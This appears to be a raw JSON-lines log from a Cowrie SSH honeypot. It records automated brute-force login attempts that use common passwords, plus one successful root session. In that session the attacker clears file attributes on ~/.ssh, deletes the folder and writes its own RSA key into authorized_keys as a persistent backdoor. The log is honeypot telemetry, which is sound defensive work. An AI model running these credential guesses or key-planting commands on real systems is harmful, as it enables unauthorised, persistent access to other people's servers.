{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:51:17.439217Z","src_ip":"196.251.115.108","session":"39441e639e2c"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":46668,"dst_ip":"1.2.3.4","dst_port":22,"session":"3c698aa2d566","protocol":"ssh","message":"New connection: 196.251.115.108:46668 (1.2.3.4:22) [session: 3c698aa2d566]","sensor":"my-vps","timestamp":"2025-08-24T23:52:00.230444Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:52:00.607949Z","src_ip":"196.251.115.108","session":"3c698aa2d566"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:52:00.608741Z","src_ip":"196.251.115.108","session":"3c698aa2d566"}
{"eventid":"cowrie.login.failed","username":"www-data","password":"password","message":"login attempt [www-data/password] failed","sensor":"my-vps","timestamp":"2025-08-24T23:52:03.581213Z","src_ip":"196.251.115.108","session":"3c698aa2d566"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:52:04.829804Z","src_ip":"196.251.115.108","session":"3c698aa2d566"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":50660,"dst_ip":"1.2.3.4","dst_port":22,"session":"7118f6990154","protocol":"ssh","message":"New connection: 196.251.115.108:50660 (1.2.3.4:22) [session: 7118f6990154]","sensor":"my-vps","timestamp":"2025-08-24T23:52:48.124359Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:52:48.453956Z","src_ip":"196.251.115.108","session":"7118f6990154"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:52:48.454610Z","src_ip":"196.251.115.108","session":"7118f6990154"}
{"eventid":"cowrie.login.failed","username":"www-data","password":"123456789","message":"login attempt [www-data/123456789] failed","sensor":"my-vps","timestamp":"2025-08-24T23:52:51.856436Z","src_ip":"196.251.115.108","session":"7118f6990154"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:52:53.303095Z","src_ip":"196.251.115.108","session":"7118f6990154"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":54424,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba5ad571b47c","protocol":"ssh","message":"New connection: 196.251.115.108:54424 (1.2.3.4:22) [session: ba5ad571b47c]","sensor":"my-vps","timestamp":"2025-08-24T23:53:34.875114Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:53:35.352980Z","src_ip":"196.251.115.108","session":"ba5ad571b47c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:53:35.353649Z","src_ip":"196.251.115.108","session":"ba5ad571b47c"}
{"eventid":"cowrie.login.failed","username":"www-data","password":"12345","message":"login attempt [www-data/12345] failed","sensor":"my-vps","timestamp":"2025-08-24T23:53:38.744858Z","src_ip":"196.251.115.108","session":"ba5ad571b47c"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:53:40.066651Z","src_ip":"196.251.115.108","session":"ba5ad571b47c"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":36406,"dst_ip":"1.2.3.4","dst_port":22,"session":"6a585153894a","protocol":"ssh","message":"New connection: 196.251.115.108:36406 (1.2.3.4:22) [session: 6a585153894a]","sensor":"my-vps","timestamp":"2025-08-24T23:54:23.756792Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:54:24.140220Z","src_ip":"196.251.115.108","session":"6a585153894a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:54:24.158707Z","src_ip":"196.251.115.108","session":"6a585153894a"}
{"eventid":"cowrie.login.failed","username":"www-data","password":"12345678","message":"login attempt [www-data/12345678] failed","sensor":"my-vps","timestamp":"2025-08-24T23:54:27.116125Z","src_ip":"196.251.115.108","session":"6a585153894a"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:54:28.314028Z","src_ip":"196.251.115.108","session":"6a585153894a"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":36510,"dst_ip":"1.2.3.4","dst_port":22,"session":"fca760012dca","protocol":"ssh","message":"New connection: 196.251.115.108:36510 (1.2.3.4:22) [session: fca760012dca]","sensor":"my-vps","timestamp":"2025-08-24T23:55:11.488715Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:55:11.820419Z","src_ip":"196.251.115.108","session":"fca760012dca"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:55:11.821318Z","src_ip":"196.251.115.108","session":"fca760012dca"}
{"eventid":"cowrie.login.failed","username":"www-data","password":"qwerty","message":"login attempt [www-data/qwerty] failed","sensor":"my-vps","timestamp":"2025-08-24T23:55:14.823116Z","src_ip":"196.251.115.108","session":"fca760012dca"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:55:16.212132Z","src_ip":"196.251.115.108","session":"fca760012dca"}
{"eventid":"cowrie.session.connect","src_ip":"113.141.171.139","src_port":55109,"dst_ip":"1.2.3.4","dst_port":22,"session":"a8fcf7b14879","protocol":"ssh","message":"New connection: 113.141.171.139:55109 (1.2.3.4:22) [session: a8fcf7b14879]","sensor":"my-vps","timestamp":"2025-08-24T23:55:24.986987Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T23:55:24.987744Z","src_ip":"113.141.171.139","session":"a8fcf7b14879"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T23:55:25.188121Z","src_ip":"113.141.171.139","session":"a8fcf7b14879"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssw0rd@2024","message":"login attempt [root/P@ssw0rd@2024] succeeded","sensor":"my-vps","timestamp":"2025-08-24T23:55:26.033245Z","src_ip":"113.141.171.139","session":"a8fcf7b14879"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T23:55:26.455273Z","src_ip":"113.141.171.139","session":"a8fcf7b14879"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T23:55:26.456004Z","src_ip":"113.141.171.139","session":"a8fcf7b14879"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T23:55:26.456905Z","src_ip":"113.141.171.139","session":"a8fcf7b14879"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:55:26.658414Z","src_ip":"113.141.171.139","session":"a8fcf7b14879"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T23:55:27.142606Z","src_ip":"113.141.171.139","session":"a8fcf7b14879"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-24T23:55:27.143357Z","src_ip":"113.141.171.139","session":"a8fcf7b14879"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-24T23:55:27.346423Z","src_ip":"113.141.171.139","session":"a8fcf7b14879"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:55:27.347324Z","src_ip":"113.141.171.139","session":"a8fcf7b14879"}
{"eventid":"cowrie.session.connect","src_ip":"113.141.171.139","src_port":55360,"dst_ip":"1.2.3.4","dst_port":22,"session":"bb35270757dd","protocol":"ssh","message":"New connection: 113.141.171.139:55360 (1.2.3.4:22) [session: bb35270757dd]","sensor":"my-vps","timestamp":"2025-08-24T23:55:27.581290Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T23:55:27.582242Z","src_ip":"113.141.171.139","session":"bb35270757dd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T23:55:27.804530Z","src_ip":"113.141.171.139","session":"bb35270757dd"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-24T23:55:28.734991Z","src_ip":"113.141.171.139","session":"bb35270757dd"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:55:29.959664Z","src_ip":"113.141.171.139","session":"bb35270757dd"}
{"eventid":"cowrie.session.connect","src_ip":"113.141.171.139","src_port":55660,"dst_ip":"1.2.3.4","dst_port":22,"session":"c34e5f59bd3a","protocol":"ssh","message":"New connection: 113.141.171.139:55660 (1.2.3.4:22) [session: c34e5f59bd3a]","sensor":"my-vps","timestamp":"2025-08-24T23:55:30.167147Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T23:55:30.168092Z","src_ip":"113.141.171.139","session":"c34e5f59bd3a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T23:55:30.377502Z","src_ip":"113.141.171.139","session":"c34e5f59bd3a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-24T23:55:31.256518Z","src_ip":"113.141.171.139","session":"c34e5f59bd3a"}
{"eventid":"cowrie.session.closed","duration":"6.5","message":"Connection lost after 6.5 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:55:31.455625Z","src_ip":"113.141.171.139","session":"a8fcf7b14879"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:55:31.467762Z","src_ip":"113.141.171.139","session":"c34e5f59bd3a"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":39668,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef8b4c0e8626","protocol":"ssh","message":"New connection: 196.251.115.108:39668 (1.2.3.4:22) [session: ef8b4c0e8626]","sensor":"my-vps","timestamp":"2025-08-24T23:55:58.863707Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:55:59.215564Z","src_ip":"196.251.115.108","session":"ef8b4c0e8626"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-he